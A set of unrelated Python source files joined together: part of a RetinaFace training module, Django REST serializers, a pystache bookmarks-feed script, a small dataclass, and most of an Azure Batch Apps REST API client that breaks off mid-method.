FaceDetectionDataset(
label_path=self.hparams["val_annotation_path"],
image_path=self.hparams["val_image_path"],
transform=from_dict(self.hparams["val_aug"]),
preproc=self.preproc,
),
batch_size=self.hparams["val_parameters"]["batch_size"],
num_workers=self.hparams["num_workers"],
shuffle=False,
pin_memory=True,
drop_last=True,
collate_fn=detection_collate,
)
def configure_optimizers(self):
optimizer = object_from_dict(
self.hparams["optimizer"], params=[x for x in self.model.parameters() if x.requires_grad]
)
scheduler = object_from_dict(self.hparams["scheduler"], optimizer=optimizer)
self.optimizers = [optimizer]
return self.optimizers, [scheduler]
def training_step(self, batch: Dict[str, torch.Tensor], batch_idx: int) -> Dict[str, Any]:
images = batch["image"]
targets = batch["annotation"]
out = self.forward(images)
loss_localization, loss_classification, loss_landmarks = self.loss(out, targets)
total_loss = (
self.loss_weights["localization"] * loss_localization
+ self.loss_weights["classification"] * loss_classification
+ self.loss_weights["landmarks"] * loss_landmarks
)
logs = {
"classification": loss_classification,
"localization": loss_localization,
"landmarks": loss_landmarks,
"train_loss": total_loss,
"lr": self._get_current_lr(),
}
return OrderedDict(
{
"loss": total_loss,
"progress_bar": {
"train_loss": total_loss,
"classification": loss_classification,
"localization": loss_localization,
},
"log": logs,
}
)
def validation_step(self, batch: Dict[str, torch.Tensor], batch_idx: int) -> Dict[str, Any]:
images = batch["image"]
image_height = images.shape[2]
image_width = images.shape[3]
annotations = batch["annotation"]
file_names = batch["file_name"]
out = self.forward(images)
location, confidence, _ = out
confidence = F.softmax(confidence, dim=-1)
batch_size = location.shape[0]
predictions_coco: List[Dict[str, Any]] = []
scale = torch.from_numpy(np.tile([image_width, image_height], 2)).to(location.device)
for batch_id in range(batch_size):
boxes = decode(
location.data[batch_id], self.priors.to(images.device), self.hparams["test_parameters"]["variance"]
)
scores = confidence[batch_id][:, 1]
valid_index = torch.where(scores > 0.1)[0]
boxes = boxes[valid_index]
scores = scores[valid_index]
boxes *= scale
# do NMS
keep = nms(boxes, scores, self.hparams["val_parameters"]["iou_threshold"])
boxes = boxes[keep, :].cpu().numpy()
if boxes.shape[0] == 0:
continue
scores = scores[keep].cpu().numpy()
file_name = file_names[batch_id]
for box_id, bbox in enumerate(boxes):
x_min, y_min, x_max, y_max = bbox
x_min = np.clip(x_min, 0, x_max - 1)
y_min = np.clip(y_min, 0, y_max - 1)
predictions_coco += [
{
"id": str(hash(f"{file_name}_{box_id}")),
"image_id": file_name,
"category_id": 1,
"bbox": [x_min, y_min, x_max - x_min, y_max - y_min],
"score": scores[box_id],
}
]
gt_coco: List[Dict[str, Any]] = []
for batch_id, annotation_list in enumerate(annotations):
for annotation in annotation_list:
x_min, y_min, x_max, y_max = annotation[:4]
file_name = file_names[batch_id]
gt_coco += [
{
"id": str(hash(f"{file_name}_{batch_id}")),
"image_id": file_name,
"category_id": 1,
"bbox": [
x_min.item() * image_width,
y_min.item() * image_height,
(x_max - x_min).item() * image_width,
(y_max - y_min).item() * image_height,
],
}
]
return OrderedDict({"predictions": predictions_coco, "gt": gt_coco})
def validation_epoch_end(self, outputs: List) -> Dict[str, Any]:
result_predictions: List[dict] = []
result_gt: List[dict] = []
for output in outputs:
result_predictions += output["predictions"]
result_gt += output["gt"]
_, _, average_precision = recall_precision(result_gt, result_predictions, 0.5)
logs = {"epoch": self.trainer.current_epoch, "mAP@0.5": average_precision}
return {"val_loss": average_precision, "log": logs}
def _get_current_lr(self) -> torch.Tensor:
lr = [x["lr"] for x in self.optimizers[0].param_groups][0]
return torch.from_numpy(np.array([lr]))[0].to(self.device)
def main():
args = get_args()
with open(args.config_path) as f:
hparams = yaml.load(f, Loader=yaml.SafeLoader)
pipeline = RetinaFace(hparams)
Path(hparams["checkpoint_callback"]["filepath"]).mkdir(exist_ok=True, parents=True)
trainer = object_from_dict(
hparams["trainer"],
logger=WandbLogger(hparams["experiment_name"]),
checkpoint_callback=object_from_dict(hparams["checkpoint_callback"]),
)
trainer.fit(pipeline)
if __name__ == "__main__":
main()
|
from .models import Song, User
from rest_framework import serializers
class SongSerializer(serializers.ModelSerializer):
class Meta:
model = Song
fields = ('id', 'title', 'artist', 'album')
class UserSerializer(serializers.ModelSerializer):
song_count = serializers.ReadOnlyField(source='songs.count')
class Meta:
model = User
fields = ('id', 'email', 'full_name', 'song_count')
class IdsSerializer(serializers.Serializer):
ids = serializers.ListField(
child=serializers.IntegerField()
)
|
import pystache
from redwind.models import Post
from sqlalchemy import desc
import isodate
FEED_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>{{{title}}}</title>
<style>
body {
font-family: sans-serif;
max-width:800px;
}
h1,h2,h3,h4 {
font-size: 1em;
}
li {
list-style: none;
}
.p-category {
list-style: none;
border: 1px solid #ddd;
border-radius:2px;
display: inline;
padding: 2px;
margin: 5px;
}
.dt-published {
margin-top:1em;
}
</style>
</head>
<body class="h-feed">
<h1 class="p-name">{{{title}}}</h1>
<ul>
{{#bookmarks}}
<li class="h-entry">
<h2 class="p-bookmark h-cite"><a href="{{bookmark}}">{{title}}</a></h2>
{{#content}}<div class="e-content">{{{.}}}</div>{{/content}}
{{#categories}}<span class="p-category">{{.}}</span>{{/categories}}
<div class="dt-published">{{published}}</div>
</li>
{{/bookmarks}}
</ul>
</body>
</html>
"""
blob = {
'title': 'Kylewm’s Bookmarks',
'bookmarks': []
}
for bmark in Post.query.filter_by(post_type='bookmark').order_by(desc(Post.published)).all():
blob['bookmarks'].append({
'title': bmark.bookmark_contexts[0].title,
'bookmark': bmark.bookmark_of[0],
'content': bmark.content_html,
'categories': [t.name for t in bmark.tags],
'published': isodate.datetime_isoformat(bmark.published),
})
print(pystache.render(FEED_TEMPLATE, blob))
|
from dataclasses import dataclass
from datetime import datetime
from . import RepoLanguages
@dataclass
class RepoStats(RepoLanguages):
created_at: datetime
stars: int
forks: int
score: float
def __hash__(self):
return super.__hash__(self)
def __eq__(self, other):
return super.__eq__(self, other)
|
#-------------------------------------------------------------------------
# The Azure Batch Apps Python Client
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#--------------------------------------------------------------------------
""" Client for the Batch Apps Management API.
"""
from batchapps import rest_client
from batchapps.files import UserFile
from batchapps import utils
from batchapps.exceptions import (
RestCallException,
FileMissingException)
import logging
API_VERSION = "2014-10-01-preview"
class Response(object):
"""
A simple container object for the response of the REST call.
:Attributes:
- success (bool)
- result
"""
def __init__(self, success, output=None):
"""
:Args:
- success (bool): Whether the REST call completed successfully and
returned an applicable result.
:Kwargs:
- output: The response from the REST client. This could be the
result of a successful API call, or it could hold exception
information for a failed call. Defaults to None.
"""
self.success = success
self.result = output
class BatchAppsApi(object):
"""
Specification of Batch Apps Management API, abstracted away
from the implementation of the :mod:`rest_client`.
This class should directly reflect the full functionality of the API,
without adding any additional layers of data processing.
:Attributes:
- headers (dict)
"""
def __init__(self, credentials, config):
"""
Create new API client:
:Args:
- credentials (:class:`.Credentials`): Credentials with which all
API calls will be authenticated.
- config (:class:`.Configuration`): Configuration of the
job type the jobs will be submitted as, as well as endpoint
and logging configuration.
"""
self._config = config
self._log = logging.getLogger('batch_apps')
self._auth = credentials
self.headers = {"Accept": "application/json",
"x-ms-version": API_VERSION,
"Content-Type": "application/json"}
def app(self):
"""
.. warning:: Deprecated. Use :meth:`.jobtype()`.
Retrieve the current jobtype from the :class:`.Configuration`.
:Returns:
- The current job type from the configuration (str).
"""
self._log.warning("app() is deprecated. "
"Please use jobtype().")
return self._config.current_jobtype()
def jobtype(self):
"""
Retrieve the current jobtype from the :class:`.Configuration`.
:Returns:
- The current jobtype from the configuration (str).
"""
return self._config.current_jobtype()
def url(self, api_call):
"""Format API endpoint URL.
:Args:
- api_call (str): the URL of the method that will be appended to
the root URL provided by the :class:`.Configuration`.
:Returns:
- The complete, formatted URL (str)
"""
end_p = self._config.endpoint()
self._log.debug("Formatting URL: https://{endpoint}/api/{api}".format(
endpoint=end_p,
api=api_call))
return "https://{endpoint}/api/{api}".format(
endpoint=end_p,
api=api_call)
def default_params(self):
"""
Get the default parameters for the job type.
Retrieves the parameters tied to the job type from the
:class:`.Configuration`
:Returns:
- Dictionary of strings of the configured parameters
"""
return self._config.default_params()
def list_jobs(self, index=0, per_call=10, name=None):
"""Lists the users jobs.
:Kwargs:
- index (int): The starting index from which the list of jobs will
be returned. The default is 0, i.e. return all jobs from the
start.
- per_call (int): The number of job entries from ``index`` to
return. The default is 10.
- name (str): Return only the jobs whose name contains the given
string. The default is None.
:Returns:
- :class:`.Response` object containing success of call. If
successful, the ``Response.result`` will contain a list of
jobs as dictionaries. If failed, ``Response.result`` will
hold the :exc:`.RestCallException`.
"""
self._log.debug("list_jobs, index={0}, per_call={1}, name={2}".format(
index,
per_call, name))
url = self.url("jobs")
req_set = {"maxResults": per_call, "startIndex": index}
if name:
req_set["nameContains"] = str(name)
try:
get_resp = rest_client.get(self._auth, url,
self.headers,
params=req_set)
except RestCallException as exp:
return Response(False, exp)
else:
if 'jobs' in get_resp:
return Response(True, get_resp)
return Response(
False,
RestCallException(KeyError,
"Key not in response message",
get_resp))
def get_job(self, job_id=None, url=None):
"""
Gets information about a job.
Job info can be retrieved by supplying **either** the job's ID
**or** a URL to the job. If both are supplied, URL is used.
:Kwargs:
- job_id (str): ID of the job on which info is requested.
- url (str): A complete URL to the job info.
:Returns:
- A :class:`.Response` object containing the job details as a
dictionary, if successful. Otherwise the Response will
contain the :exc:`.RestCallException`.
:Raises:
- :class:`.RestCallException` if neither job ID or URL are
supplied.
- :class:`.RestCallException` if job details dictionary is
malformed / missing necessary keys
"""
self._log.debug("get_job, job_id={0}, url={1}".format(job_id, url))
if not url and job_id:
url = self.url("jobs/{jobid}").format(jobid=job_id)
elif not url and not job_id:
return Response(
False,
RestCallException(AttributeError,
"Either job_id or url must be set",
None))
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
if utils.valid_keys(get_resp, ['id', 'name', 'type']):
return Response(True, get_resp)
return Response(
False,
RestCallException(KeyError,
"incorrectly formatted job response",
get_resp))
def send_job(self, job_message):
"""Submits a job.
:Args:
- job_message (dict): A job specification formatted as a
dictionary.
:Returns:
- A :class:`.Response` object containing a dictionary of the newly
submitted job's ID and URL if successful. Otherwise the
Response will contain the :exc:`.RestCallException`.
:Raises:
- :class:`.RestCallException` if new job dictionary is
malformed / missing necessary keys.
"""
self._log.debug("send_job, job_message={0}".format(job_message))
url = self.url("jobs")
try:
post_resp = rest_client.post(self._auth,
url,
self.headers,
message=job_message)
except RestCallException as exp:
return Response(False, exp)
else:
if utils.valid_keys(post_resp, ['jobId', 'link']):
return Response(True, post_resp)
return Response(
False,
RestCallException(KeyError,
"incorrectly formatted job response",
post_resp))
def get_log(self, job_id, start=None, max_lines=100):
"""
Gets log messages for a job.
These are the Batch Apps system logs, rather than those of the
application.
:Args:
- job_id (str): The ID of the job on which to download the logs.
:Kwargs:
- start (str): The start time from which the logs will be
downloaded. If not specified, the default is from the
beginning of the job.
- max_lines (int): The max number of logging messages to retrieve.
The default is 100. If set to ``None``, all messages from start
time will be retrieved.
:Returns:
- A :class:`.Response` object with a dictionary containing the
timestamp of the most recent message returned and a list of
the log messages, represented as dictionaries, with the message
text, timestamp and task id that the message applies to.
- If the call failed, the response contains the
:class:`.RestCallException`.
"""
self._log.debug("get_log, job_id={0}, start={1}, max_lines={2}".format(
job_id,
start,
max_lines))
url = self.url("jobs/{jobid}/log").format(jobid=job_id)
get_params = {}
if start:
get_params['since'] = str(start)
if max_lines:
get_params['maxResults'] = int(max_lines)
try:
get_resp = rest_client.get(self._auth,
url,
self.headers,
params=get_params)
except RestCallException as exp:
return Response(False, exp)
else:
#TODO: Check for specific keys here.
return Response(True, get_resp)
def cancel(self, job_id):
"""Cancels a running job.
:Args:
- job_id (str): The ID of the job to be cancelled.
:Returns:
- A :class:`.Response` object with the POST response, however this
is not required if the call is successful. The call will only
be successful if the job can be and is cancelled.
- If the job is not running (and therefore cannot be cancelled),
the call will fail and the :class:`.RestCallException` will be
returned in the :class:`.Response` object.
- Any other communication failures will also return a
:class:`.RestCallException`.
"""
self._log.debug("cancel, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/actions/cancel").format(jobid=job_id)
try:
post_resp = rest_client.post(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, post_resp)
def reprocess(self, job_id):
"""
Reprocesses any failed tasks in the job.
This call will also re-activate a job if it has a 'Failed' status.
:Args:
- job_id (str): ID of the job to be reprocessed.
:Returns:
- A :class:`.Response` object containing a dictionary with the job
ID of the reprocessed job and a URL to retrieve the job
information (see :meth:`.BatchAppsApi.get_job()`).
- If the call failed the response will hold the
:class:`.RestCallException`.
"""
self._log.debug("reprocess, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/actions/reprocess").format(jobid=job_id)
try:
post_resp = rest_client.post(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, post_resp)
def list_outputs(self, job_id):
"""
Lists the output files produced by a job.
This method will only list final outputs of the job, created by a
Merge Task.
To retrieve a list of all files created by all tasks of the job use
:meth:`.list_output_files()`.
Can be used to ascertain the output filenames before calling the
generic output download URL.
:Args:
- job_id (str): ID of the job whose outputs will be listed.
:Returns:
- A list of the outputs represented as dictionaries, each with
the 'name' and 'type' of the output as well as a download
'link'. Contained in a :class:`.Response`. If the call failed,
Response will contain the :class:`.RestCallException`.
"""
self._log.debug("list_outputs, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/outputs").format(jobid=job_id)
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
outputs = []
if (not 'jobOutputs' in get_resp
or not isinstance(get_resp['jobOutputs'], list)):
return Response(
False,
RestCallException(KeyError,
"jobOutputs key not in response message",
get_resp))
# Reformat output dictionary to be more manageable
for output in get_resp['jobOutputs']:
outputs.append({
'name': output.get('name'),
'link': output.get('link', {'href':None}).get('href'),
'type': output.get('kind')
})
return Response(True, outputs)
def get_output(self,
download_dir,
size,
fname,
overwrite,
job_id=None,
otype='output',
url=None,
callback=None,
block=4096):
"""
Gets the content of the job output or its thumbnail.
Either ``url``, or both ``job_id`` and ``otype`` must be set.
If all three are set, URL will be used.
:Args:
- download_dir (str): The full path to the directory where the
output will be downloaded to.
- size (int): The size in bytes of the file to be downloaded.
Used for progress reporting.
- fname (str): The name of the output file to be downloaded.
- overwrite (bool): Whether to overwrite an existing file if
present.
:Kwargs:
- job_id (str): The ID of the job whose output will be downloaded.
The default is None.
- otype (str): The type of output to be downloaded, must be a
string in ``['output', 'preview']``.
- url (str): The URL directly to the file to be downloaded. If
supplied, ``job_id`` and ``otype`` will not be used.
The default is None.
- callback (func): A function to be called to report download progress.
The function must take three arguments: the percent downloaded (float), the
bytes downloaded (float), and the total bytes to be downloaded (float).
- block (int): The amount of data downloaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the GET response, however this is not
required if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct
URL arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug(
"get_output, download_dir={dd}, size={sz}, fname={fn}, "
"overwrite={ow}, job_id={ji}, url={ur}, otype={ot}, block={bl}".format(
dd=download_dir,
sz=size,
fn=fname,
ow=overwrite,
ji=job_id,
ur=url,
ot=otype,
bl=block))
if not url and job_id:
if otype.lower() not in ['output', 'preview']:
return Response(
False,
RestCallException(
ValueError,
"output type must be 'output' or 'preview'",
None))
url = self.url("jobs/{jobid}/outputs/{type}").format(jobid=job_id,
type=otype)
elif not url and not job_id:
return Response(
False,
RestCallException(AttributeError,
"Either job_id or url must be set",
None))
try:
get_resp = rest_client.download(self._auth,
url,
self.headers,
download_dir,
size,
overwrite,
f_name=fname,
block_size=block,
callback=callback)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def props_output(self, job_id=None, otype='output', url=None):
"""
Gets the properties of the job output or preview.
Used to obtain the size of the final job output or its thumbnail,
which is returned in the response Content Length header.
Either ``url``, or both ``job_id`` and ``otype`` must be set (although
``otype`` is already set by default).
If all three are set, URL will be used.
:Kwargs:
- job_id (str): The ID of the job whose output will be checked.
The default is None.
- otype (str): The type of output to be checked, must be a
string in ``['output', 'preview']``.
- url (str): The URL directly to the file to be checked. If
supplied, ``job_id`` and ``otype`` will not be used.
The default is None.
:Returns:
- :class:`.Response` with the requested output size in bytes (int)
if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct URL
arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug("props_output, job_id={0}, "
"otype={1}, url={2}".format(job_id, otype, url))
if not url and job_id:
if otype not in ['output', 'preview']:
return Response(
False,
RestCallException(
ValueError,
"output type must be 'output' or 'preview'",
None))
url = self.url("jobs/{jobid}/outputs/{type}").format(jobid=job_id,
type=otype)
elif not url and not job_id:
return Response(
False,
RestCallException(AttributeError,
"Either job_id or url must be set",
None))
try:
head_resp = rest_client.head(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, head_resp)
def list_output_files(self, job_id):
"""Lists the intermediate output files produced during a job.
:Args:
- job_id (str): The ID of the job whose outputs will be listed.
:Returns:
- A list of the outputs represented as dictionaries, each with the
'name' and 'type' of the output as well as a download 'link'.
Contained in a :class:`.Response`. If the call failed, Response
will contain the :class:`.RestCallException`.
"""
self._log.debug("list_output_files, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/outputs/files").format(jobid=job_id)
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
outputs = []
if (not 'outputs' in get_resp
or not isinstance(get_resp['outputs'], list)):
return Response(False,
RestCallException(
KeyError,
"outputs key not in response message",
get_resp))
for output in get_resp['outputs']:
outputs.append({
'name': output.get('name'),
'link': output.get('link', {'href':None}).get('href'),
'type': output.get('kind')
})
return Response(True, outputs)
def get_output_file(self,
download_dir,
size,
overwrite,
job_id=None,
fname=None,
url=None,
callback=None,
block=4096):
"""
Gets the content of a file created in a job.
Either ``url``, or both ``job_id`` and ``fname`` must be set.
If all three are set, job_id & fname will be used.
:Args:
- download_dir (str): The full path to the directory where the
output will be downloaded to.
- size (int): The size in bytes of the file to be downloaded.
Used for progress reporting.
- overwrite (bool): Whether to overwrite an existing file if
present.
:Kwargs:
- job_id (str): The ID of the job whose output will be downloaded.
The default is None.
- fname (str): The name of the output file to be downloaded.
- url (str): The URL directly to the file to be downloaded.
The default is None.
- callback (func): A function to be called to report download progress.
The function must take three arguments: the percent downloaded (float), the
bytes downloaded (float), and the total bytes to be downloaded (float).
- block (int): The amount of data downloaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the GET response, however this is not
required if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct URL
arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug("get_output_file, download_dir={dd}, size={sz}, "
"overwrite={ow}, job_id={ji}, fname={fn}, "
"url={ur}, block={bl}".format(dd=download_dir,
sz=size,
ow=overwrite,
ji=job_id,
fn=fname,
ur=url,
bl=block))
name = fname if fname else None
if job_id and name:
url = self.url("jobs/{jobid}/outputs/files/{name}")
url = url.format(jobid=job_id, name=name)
elif url is None:
return Response(
False,
RestCallException(
AttributeError,
"Either output url or job id and filename required.",
None))
try:
get_resp = rest_client.download(self._auth,
url,
self.headers,
download_dir,
size, overwrite,
f_name=name,
block_size=block,
callback=callback)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def props_output_file(self, job_id=None, fname=None, url=None):
"""
Get the file size of a given task output.
Used to obtain the size of the requested file, which is returned in
the response Content Length header. Either ``url``, or both ``job_id``
and ``fname`` must be set. If all three are set, job_id & fname will
be used.
:Kwargs:
- job_id (str): The ID of the job whose output will be checked.
The default is None.
- fname (str): The name of the output file to be downloaded.
- url (str): The URL directly to the file to be checked.
The default is None.
:Returns:
- :class:`.Response` with the requested output size in bytes (int)
if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct
URL arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug("props_output_file, job_id={0}, "
"fname={1}, url={2}".format(job_id, fname, url))
if job_id and fname:
url = self.url("jobs/{jobid}/outputs/files/{name}")
url = url.format(jobid=job_id, name=fname)
elif not url:
return Response(
False,
RestCallException(
AttributeError,
"Either output url or job id and filename required.",
None))
try:
head_resp = rest_client.head(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, head_resp)
def list_tasks(self, job_id=None, url=None):
"""
List the tasks of a job.
Either ``job_id`` *or* ``url`` must be set. If both are set ``url``
will be used.
:Kwargs:
- job_id (str): ID of of the job to list the tasks for.
The default is None.
- url (str): Direct URL to the task list of the job
(supplied by :meth:`.BatchAppsApi.get_job()`)
:Returns:
- A :class:`.Response` object containing the list of task
dictionaries if the call is successful.
- A :class:`.Response` object containing the
:class:`.RestCallException` is the call failed.
"""
self._log.debug("list_tasks, job_id={0}, url={1}".format(job_id, url))
if not url and job_id:
url = self.url("jobs/{jobid}/tasks").format(jobid=job_id)
elif not url and not job_id:
return Response(False,
RestCallException(
AttributeError,
"Either job_id or url must get set",
None))
try:
resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
if 'tasks' not in resp or not isinstance(resp['tasks'], list):
return Response(False,
RestCallException(
KeyError,
"tasks key not in response message",
resp))
return Response(True, resp['tasks'])
def list_task_outputs(self, job_id, task):
"""Lists the output files produced by a task.
:Args:
- job_id (str): The ID of the job the task outputs belong to.
- task (int, str): The ID of the task whose outputs will be listed.
:Returns:
- A list of the outputs represented as dictionaries, each with the
'name' and 'type' of the output as well as a download 'link'.
Contained in a :class:`.Response`. If the call failed,
Response will contain the :class:`.RestCallException`.
"""
self._log.debug("list_task_outputs, job_id={0}, "
"task={1}".format(job_id, task))
url = self.url("jobs/{jobid}/tasks/{taskid}/outputs/files")
url = url.format(url, jobid=job_id, taskid=task)
try:
resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
outputs = []
if 'outputs' not in resp or not isinstance(resp['outputs'], list):
return Response(False,
RestCallException(
KeyError,
"outputs key not in response message",
resp))
for output in resp['outputs']:
outputs.append({
'name': output.get('name'),
'link': output.get('link', {'href':None}).get('href'),
'type': output.get('kind')
})
return Response(True, outputs)
def cancel_task(self, job_id, task):
"""Cancel a running task of a job in progress.
:Args:
- job_id (str): The ID of the job whose task will be cancelled.
- task (int, str): The ID of the task to be cancelled.
:Returns:
- A :class:`.Response` object with the POST response, however this
is not required if the call is successful. The call will only
be successful if the task can be and is cancelled.
- If the task is not running (and therefore cannot be cancelled),
the call will fail and the :class:`.RestCallException` will be
returned in the :class:`.Response` object.
- Any other communication failures will also return a
:class:`.RestCallException`.
"""
self._log.debug("cancel_task, job_id={0}, task={1}".format(job_id,
task))
url = self.url("jobs/{jobid}/tasks/{taskid}/actions/cancel")
url = url.format(url, jobid=job_id, taskid=task)
try:
resp = rest_client.post(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, resp)
def list_files(self):
"""
Lists the users files.
This refers to files loaded by the user (sometimes referred to as
assets) as distinct from task or job outputs generated during
task processing.
:Returns:
- A :class:`.Response` object containing a list of files as
dictionaries, with data:
``['id','name','lastModifiedBy','lastModifiedTime','link']``
- If the call failed or if the response is incomplete/malformed
a :class:`.Response` object with a :class:`.RestCallException`.
"""
self._log.debug("list_files, no params")
url = self.url("files")
try:
resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
if 'files' not in resp or not isinstance(resp['files'], list):
return Response(False,
RestCallException(
KeyError,
"files key not in response message",
resp))
return Response(True, resp['files'])
def query_files(self, files):
"""
Queries for user files matching specified criteria.
This is used to detect whether user's files already exist in the cloud,
and if they're up-to-date. Any number of files can be queried in a
single call.
:Args:
- files (list, dict, str): The files to query.
If this is in the form of a single filename, or list of
filenames, the call will query for user files that match
that filename. If this is in the form of a dict, or list of
dicts, the call will query for a more specific match.
Query dict should have the keys ``{'fileName', 'timestamp'}``
and optionally ``{'originalPath'}``.
:Returns:
- If the query was by filename, a :class:`.Response` containing a
list of all the files (as dicts) with that name will be
returned.
- If the query was by specification, a :class:`.Response`
containing a list of all the matching files (as dicts) will
be returned.
- If the call failed, a :class:`.Response` object containing a
:class:`.RestCallException` will be returned.
"""
self._log.debug("query_files, files={0}".format(files))
url = self.url("files/query/{queryby}")
operations = {str:'byname', dict:'byspecification'}
optype = type(files)
if optype == list and len(files) >= 1:
optype = type(files[0])
elif optype == list and len(files) < 1:
return Response(False,
RestCallException(
ValueError,
"File list empty",
ValueError("File list empty")))
else:
files = [files]
if optype not in operations:
error = ("File query can be done with single "
"file name, list of names, or userfile "
"spec dict. Not {t}".format(t=type(files)))
return Response(False, RestCallException(TypeError,
error,
TypeError(error)))
req_type = operations[optype]
self._log.info("Querying files using {0}".format(req_type))
url = url.format(queryby=req_type)
if req_type == 'byspecification':
message = {"Specifications": files}
else:
message = {"Names": files}
self._log.debug("File query url={0}, message={1}".format(url, message))
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
if 'files' not in resp or not isinstance(resp['files'], list):
return Response(False,
RestCallException(
KeyError,
"files key not in response message",
resp))
return Response(True, resp['files'])
def query_missing_files(self, files):
"""
Checks whether user files are present in the cloud.
As opposed to :meth:`.query_files()`, this call returns the files that
are **not** present in the cloud.
:Args:
- files (dict, list): Either a file specification dictionary, or a
list of file spec dictionaries.
:Returns:
- A :class:`.Response` object containing a list of the files that
don't yet exist in the cloud. The files are represented as a
dict with only a 'name' key.
- If the call failed, a :class:`.Response` object containing
a :class:`.RestCallException` is returned.
"""
#TODO: Check whether 'FileHash' is supported.
self._log.debug("query_missing_files, files={0}".format(files))
url = self.url("files/query/missing")
if type(files) == dict:
files = [files]
elif not (type(files) == list
and len(files) >= 1
and type(files[0]) == dict):
error = ("File query can be done with single userfile "
"spec dict, or list of userfile spec dicts. "
"Not {t}".format(t=type(files)))
return Response(False, RestCallException(TypeError, error, None))
message = {"Specifications": files}
try:
resp = rest_client.post(self._auth, url, self.headers, message)
except RestCallException as exp:
return Response(False, exp)
if 'files' not in resp or not isinstance(resp['files'], list):
return Response(
False,
RestCallException(KeyError,
"files key not in response message",
resp))
return Response(True, resp['files'])
def get_file(self, userfile, size, download_dir, overwrite=False,
callback=None, block=4096):
"""Gets the content of a file previously uploaded by the user.
:Args:
- userfile (:class:`.UserFile`): The userfile reference for the
file to be downloaded. Could be generated from a
:meth:`.FileManager.list_files()` call or file query.
Must have 'url' attr.
- size (int): Size of the file in byte to be downloaded
(see :meth:`.props_file()`).
- download_dir (str): The full path to the destination directory.
:Kwargs:
- overwrite (bool): Whether to overwrite a destination file if it
already exists. The default is ``False``.
- callback (func): A function to be called to report download progress.
The function must take three arguments: the percent downloaded (float), the
bytes downloaded (float), and the total bytes to be downloaded (float).
- block (int): The amount of data downloaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the GET response, however this is not
required if the call was successful.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
if not isinstance(userfile, UserFile):
return Response(False, RestCallException(TypeError,
"Not a valid UserFile",
None))
self._log.debug("get_file, file={0}, size={1}, "
"download_dir={2}, overwrite={3}, block={4}".format(userfile,
size,
download_dir,
overwrite,
block))
url = userfile.url
self._log.debug("Get file url: {0}".format(url))
try:
get_resp = rest_client.download(self._auth,
url,
self.headers,
download_dir,
size,
overwrite=overwrite,
block_size=block,
callback=callback)
except RestCallException as exp:
return Response(False, exp)
else:
#TODO: Reconfigure original userfile?
return Response(True, get_resp)
def props_file(self, userfile):
"""Gets the properties of a file previously uploaded by the user.
:Args:
- userfile (:class:`.UserFile`): The userfile reference for the
file to be checked. Could be generated from a
:meth:`.FileManager.list_files()` call or file query.
Must have 'url' attr.
:Returns:
- :class:`.Response` with the requested file size in bytes (int) if
the call was successful.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
if not isinstance(userfile, UserFile):
return Response(False,
RestCallException(TypeError,
"Not a valid UserFile",
None))
self._log.debug("props_file, file={0}".format(userfile))
url = userfile.url
try:
head_resp = rest_client.head(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, head_resp)
def send_file(self, userfile, callback=None, block=4096):
"""Uploads a user file for use in a job.
:Args:
